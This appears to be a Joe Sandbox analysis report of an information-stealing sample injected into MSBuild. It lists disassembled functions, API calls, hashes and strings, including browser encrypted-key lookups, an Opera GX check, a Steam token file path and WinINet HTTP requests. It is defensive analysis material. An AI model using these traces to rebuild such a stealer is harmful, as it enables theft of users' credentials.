Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: ~{A
API String ID: 2104210347-1816022387
Opcode ID: 48da02e1e35bd615d58e63d55da032bf86aad5faf3161476d003d3cbf91425f6
Instruction ID: ef6e44f044fd48bf473e8ed9b3318a571f04af2e7fbcf45178638c8cb6289389
Opcode Fuzzy Hash: 48da02e1e35bd615d58e63d55da032bf86aad5faf3161476d003d3cbf91425f6
Instruction Fuzzy Hash: 3231F77280010DEFDF15EB60DC43EE8377AEB08314F1440AEF606932A1EA769B919F55

Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

Strings

ERROR, xrefs: 00416896
ERROR, xrefs: 0041686B

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: c006aa10760bc954efd806e84495a2d06b24e97a73256d69b96c1a27bfc4838e
Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
Opcode Fuzzy Hash: c006aa10760bc954efd806e84495a2d06b24e97a73256d69b96c1a27bfc4838e
Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9

Function 00416FA7 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 0041700E
CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: 1c6142cbbd9849c9f35e06356520fbbbc19007ee5fb9fef6d8df9f607a11363d
Instruction ID: 6ddc57dea45eff21f3b413cd8a29bb57df9be50e409c6c2ee2748a51ac3a6ecc
Opcode Fuzzy Hash: 1c6142cbbd9849c9f35e06356520fbbbc19007ee5fb9fef6d8df9f607a11363d
Instruction Fuzzy Hash: E6217832900229ABCF10EF96EC419DE7BB9FF44358F10402BF904A3150D738AA86CFA4

Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5

Function 6C493060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C493095

Part of subcall function 6C4935A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C51F688,00001000), ref: 6C4935D5
Part of subcall function 6C4935A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4935E0
Part of subcall function 6C4935A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C4935FD
Part of subcall function 6C4935A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C49363F
Part of subcall function 6C4935A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C49369F
Part of subcall function 6C4935A0: __aulldiv.LIBCMT ref: 6C4936E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C49309F

Part of subcall function 6C4B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4B56EE,?,00000001), ref: 6C4B5B85
Part of subcall function 6C4B5B50: EnterCriticalSection.KERNEL32(6C51F688,?,?,?,6C4B56EE,?,00000001), ref: 6C4B5B90
Part of subcall function 6C4B5B50: LeaveCriticalSection.KERNEL32(6C51F688,?,?,?,6C4B56EE,?,00000001), ref: 6C4B5BD8
Part of subcall function 6C4B5B50: GetTickCount64.KERNEL32 ref: 6C4B5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C4930BE

Part of subcall function 6C4930F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C493127
Part of subcall function 6C4930F0: __aulldiv.LIBCMT ref: 6C493140

Part of subcall function 6C4CAB2A: __onexit.LIBCMT ref: 6C4CAB30

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 29d4edaef1ed0d66ab58758f5f77899cfc8c0f0f506cc141029396e58646ed8a
Instruction ID: cc672e7ccb13b3772fa2e5717c022caef23510b2933f97a0191287d21343a3d0
Opcode Fuzzy Hash: 29d4edaef1ed0d66ab58758f5f77899cfc8c0f0f506cc141029396e58646ed8a
Instruction Fuzzy Hash: CFF0F922E2074897CA10DF348C46EE6B774AF6B124F12531DE85D63921FB2061D8C3CA

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 91349af9fc11f51cdd66d8c095bcc11cf00554399c61268dd0ddd9e0b6a94c24
Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
Opcode Fuzzy Hash: 91349af9fc11f51cdd66d8c095bcc11cf00554399c61268dd0ddd9e0b6a94c24
Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 004170C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 0041710E

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041711E

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: cc6fcce903024a9fea6a23bafcd441d12855246dee4bda35170fe48c24b99249
Instruction ID: 271d1becf7a3678e07a024325e19a0bcf1d7841c1b1dc1186d3e3fa3453cba64
Opcode Fuzzy Hash: cc6fcce903024a9fea6a23bafcd441d12855246dee4bda35170fe48c24b99249
Instruction Fuzzy Hash: BA017531E0010867CF00FBE6DD478CD7B74AF04358F504136FA0073152D778AA8A86D5

Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Strings

1iA, xrefs: 00411E47

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: 1iA
API String ID: 3494564517-1863120733
Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715

Function 0041CCCB Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CCDC

Part of subcall function 0041BC7F: lstrlenA.KERNEL32(?,0041CCED,0041CD8F,00000000,06400000,00000003,00000000,0041768F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BCB1
Part of subcall function 0041BC7F: malloc.MSVCRT ref: 0041BCB9
Part of subcall function 0041BC7F: lstrcpyA.KERNEL32(00000000,?), ref: 0041BCC4

malloc.MSVCRT ref: 0041CD19

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: fcaced55c1c361c3e27715ea7ae3a17afdad1615e326a9d39dd71d0aa4f9bcfc
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: 6BF0F0721412166BDB206F6AEC8098BBB94EB457A0F150037FD0997351EA38CC4086F9

Function 004185BE Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
